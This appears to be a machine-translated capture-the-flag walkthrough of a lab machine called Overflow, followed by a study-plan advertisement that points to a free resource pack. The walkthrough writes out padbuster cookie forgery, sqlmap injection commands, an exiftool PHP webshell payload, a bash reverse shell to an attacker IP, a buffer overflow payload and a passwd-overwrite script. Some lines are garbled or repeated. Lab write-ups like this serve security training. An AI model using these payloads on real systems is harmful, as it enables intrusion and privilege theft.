Foreword
This is a difficult target machine. The content of the target machine mainly examines various aspects of web vulnerability exploitation, reverse engineering, permission maintenance, privilege escalation, etc. This target machine is very suitable for entry-level reverse engineering, and it is very helpful in improving penetration thinking. I learned from it. Also benefited a lot.
Problem-solving ideas
Information collection
The target machine mainly opens ssh, web and smtp services.
After logging in to the web page, I found that there was a registration form. After registering and logging in, I did not find any valuable information.
Use the directory fuzz tool to fuzz the directory and find the logs.php
file, but it shows that it is not authenticated.
After finding no other clues, I captured the packet and modified the cookie value, and found a new directory ../logout.php?err=1
After jumping to this page, I found that there may be a stuffing attack.
Exploitation
padbuster blast
Use padbuster to populate cookies to prompt attack and blast.
padbuster http://overflow.htb/home/index.php cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx 8 -cookies auth=cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx -encoding 0
Use the padbuster tool to blast Admin’s cookie value and obtain the cookie value of the admin account.
padbuster http://overflow.htb/home/index.php cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx 8 -cookies auth=cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx -encoding 0 -plaintext="user=Admin"
Replace the cookie value of the ordinary account and refresh the page, and find that there is an Admin Panel
page.
It was found that it is a made simple CMS
framework. I found many nDays on EDB, but they are all based on certification.
SQL injection
To no avail, when I clicked on the Logs page and viewed the source code, I found a new directory file ../config/admin_last_login.js
When accessing this js file, a new url address was found http://overflow.htb/home/logs.php?name=admin
The version file was discovered through directory scanning, and the CMS version was found to be 2.2.8
. During the EDB search, it was found that there was a SQL injection vulnerability.
Go to SQLMAP directly and find that there is GET type injection.
sqlmap -u "http://overflow.htb/home/logs.php?name=admin" --cookie="auth=BAitGdYOupMjA3gl1aFoOwAAAAAAAAAA"
Inject into the database.
sqlmap -u "http://overflow.htb/home/logs.php?name=admin" --cookie="auth=BAitGdYOupMjA3gl1aFoOwAAAAAAAAAA" --dbs
Inject the cmsmsdb
data table and discover the cms_users
and cms_siteprefs
data tables.
sqlmap -u "http://overflow.htb/home/logs.php?name=admin" --cookie="auth=BAitGdYOupMjA3gl1aFoOwAAAAAAAAAA" -D cmsmsdb
The fields of the cms_users
data table were injected and the hash values of the admin
and editor
accounts were found.
Next, the salt value needs to be injected. The value exists in the cms_siteprefs
table and the salt value 6c2d17f37e226486
is obtained.
After getting the salt value, you need to modify the field value corresponding to the EXP before EDB.
As a result, the explosion of the admin account failed, but the plaintext value of the editor account could be obtained.
File upload vulnerability
I used the editor account to log in to the CMS, but I didn’t find anything that could be used successfully. Accidentally found a subdomain name frvbuild-job.overflow.htb
After adding it to the hosts file and accessing it, I found another form. You can log in successfully using the editor account.
There is an upload point in the user configuration. When trying to upload the PHP webshell, it was found to be filtered.
When uploading a normal picture, I found that the output was in the format of exiftool
.
Try generating a picture horse and utilizing it.
exiftool -DocumentName="<h1>test<br> <?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd=(\$_REQUEST['cmd']);system(\$cmd);echo '< pre>'}__halt__compiler();?></h1>" webshell.jpg
But I found that the image was renamed after it was uploaded, so I couldn’t use it.
Finally, it was discovered that the exploit script of the exiftool tool was found on EDB, and the exploit script could also be successfully found on MSF.
It should be noted that if you are using the latest kali, the payload needs to be replaced with cmd/unix/reverse_netcat
, otherwise the shell cannot be successfully received.
Elevation of privilege
www-data privilege escalation tester
Uploaded the linpeas.sh
script and found a database password.
After checking the /etc/passwd
file, we found that there is a developer
and tester
account. You can successfully log in to the developer account using this password.
A script commontask.sh
was found in the /opt
directory, and a non-existent domain name appeared in the script content. taskmanage.overflow.htb
. You can try to modify the hosts file and point the domain name to the local IP for Trojan poisoning. The content of the task.sh
script is as follows.
bash -i > & amp; /dev/tcp/10.10.14.89/4444 0> & amp;1
Start the local http service and receive the shell of the tester account.
tester privilege escalation root
Because the obtained shell terminal is unstable, the permissions of the tester user need to be persisted.
We can also upload the linpeas.sh
script for vulnerability exploration, but here we manually found a file file_encrypt
in the /opt/file_encrypt
directory. This file has root permissions.
Reverse Engineering
Perform reverse engineering analysis on this program and locate the check_pin
function. The C pseudocode is as follows.
void check_pin(void) { undefined local_2c[20]; int local_18; long local_14; int local_10; \t local_10 = rand(); local_14 = random(); printf("This is the code: %i, Enter the Pin: ",local_10); __isoc99_scanf( & amp;DAT_00010d1d, & amp;local_18); if(local_14 == local_18) { printf("name: "); __isoc99_scanf( & amp;DAT_00010c63, & amp;local_2c); puts("Thanks for checking.You can give you feedback for improves"); }else{ puts("Wrong Pin"); } return; }
It is not difficult to see the logic of the code. The value we entered is saved to the variable local_18
, and then compared with the variable value of local_14
, and the value of local_14
The variable value is generated through the random
function. After we locate the random
function, the C pseudocode is as follows.
long random(void) { unit in_stack_00000004; uint local_c; int local_8; \t local_c = 0x6b8b4567; for(local_8 = 0;local_8 < 10;local_8=local_8 + 1) { local_c = local_c * 0x59 + 0x14; } return local_c ^ in_stack_00000004; }
Use gdb to view the program and find that the program finally performs an XOR operation and the program starts from the address 0x6b8b4567
.
After figuring out the program, you can write an exploit script. Run the following script to get the PIN value -202976456
#!/usr/bin/python3 import ctypes local_c_initial = 0x6b8b4567 local_c = 0x6b8b4567 local_8 = 0 while (local_8 <10): local_c = local_c * 0x59 + 0x14 local_8 = local_8 + 1 PIN = ctypes.c_int(local_c ^ local_c_initial).value print(“The PIN code is: “, PIN)
Buffer overflow vulnerability
Enter a large number of characters to check for possible buffer overflow.
Use msf-pattern_offset
to identify an overflow offset at 44.
Then you can use a period of characters to fill the EIP register to achieve overflow.
python3 -c "print('\x41'*44 + '\x5b\x58\x55\x56')"
Then a new idea emerged, which is to copy the passwd file and fill in the new account fields into the original passwd file through this vulnerability.
#!/usr/bin/python3 source = open('/tmp/passwd','rb').read() dest = open('tmp/passwd2','wb') for i in source: dest.write(bytes([i^0x9b]))
, through this vulnerability, the new account field is overflowed into the original passwd file.
#!/usr/bin/python3 source = open('/tmp/passwd','rb').read() dest = open('tmp/passwd2','wb') for i in source: dest.write(bytes([i^0x9b]))
[External link pictures are being transferred…(img-uXK1kpwG-1697854001044)]
[External link pictures are being transferred…(img-df9wk3Hr-1697854001045)]
Next, I will divide a study plan for each student!
Study plan
So the question comes again, as a newbie, what should I learn first and what should I learn next?
Since you have asked so straightforwardly, I will tell you what you should start learning from scratch:
Phase 1: Junior Network Security Engineer
Next, I will arrange a one-month basic network security plan for you. After you finish the course, you can basically work in a network security-related job, such as penetration testing, Web penetration, security services, security analysis, etc. ;Among them, if you learn the class guarantee module well, you can also work as a class guarantee engineer.
Comprehensive salary range 6k~15k
1. Network security theoretical knowledge (2 days)
① Understand the relevant background and prospects of the industry and determine the development direction.
②Learn laws and regulations related to network security.
③The concept of network security operations.
④Introduction to MLPS, regulations, processes and specifications for MLPS. (Very important)
2. Penetration testing basics (1 week)
①Penetration testing process, classification and standards
②Information collection technology: active/passive information collection, Nmap tool, Google Hacking
③Vulnerability scanning, vulnerability exploitation, principles, utilization methods, tools (MSF), bypassing IDS and anti-virus reconnaissance
④Host attack and defense drills: MS17-010, MS08-067, MS10-046, MS12-20, etc.
3. Operating system basics (1 week)
①Common functions and commands of Windows system
②Common functions and commands of Kali Linux system
③Operating system security (system intrusion investigation/system reinforcement basis)
4. Computer network basics (1 week)
①Computer network basics, protocols and architecture
②Network communication principles, OSI model, data forwarding process
③Common protocol analysis (HTTP, TCP/IP, ARP, etc.)
④Network attack technology and network security defense technology
⑤Web vulnerability principles and defense: active/passive attacks, DDOS attacks, CVE vulnerability recurrence
5. Basic database operations (2 days)
①Database basics
②SQL language basics
③Database security reinforcement
6. Web penetration (1 week)
①Introduction to HTML, CSS and JavaScript
②OWASP Top10
③Web vulnerability scanning tool
④Web penetration tools: Nmap, BurpSuite, SQLMap, others (Chopper, Miss Scan, etc.)
So, it has taken about a month so far. You have successfully become a “script kiddie”. So do you still want to continue exploring?
Stage 2: Intermediate or senior network security engineer (depending on your ability)
Comprehensive salary range 15k~30k
7. Script programming learning (4 weeks)
in the field of cybersecurity. The ability to program is the essential difference between a “script kiddie” and a true network security engineer. In the actual penetration testing process, in the face of complex and changeable network environments, when commonly used tools cannot meet actual needs, it is often necessary to expand existing tools, or write tools and automated scripts that meet our requirements. At this time, Requires certain programming skills. In the CTF competition, where every second counts, if you want to effectively use homemade script tools to achieve various purposes, you need to have programming skills.
For students who are starting from scratch, I suggest you choose one of the scripting languages Python/PHP/Go/Java and learn to program common libraries.
Set up a development environment and choose an IDE. Wamp and XAMPP are recommended for PHP environments, and Sublime is highly recommended for IDEs;
Learn Python programming. The learning content includes: grammar, regularity, files, networks, multi-threading and other common libraries. We recommend “Python Core Programming”. There is no need to read it all.
Use Python to write exploits for vulnerabilities, and then write a simple web crawler
Learn basic PHP syntax and write a simple blog system
Be familiar with the MVC architecture and try to learn a PHP framework or Python framework (optional)
Understand Bootstrap layout or CSS.
Phase 3: Top Network Security Engineer
If you are interested in getting started with network security, you can click here if you need it Big benefits of network security: Getting started & advanced full set of 282G learning resource package to share for free!
Sharing learning materials
Of course, giving only plans but not learning materials is tantamount to being a hooligan. Here is a [282G] learning material package for network security engineers from entry to proficiency. You can click on the two below Get the QR code link.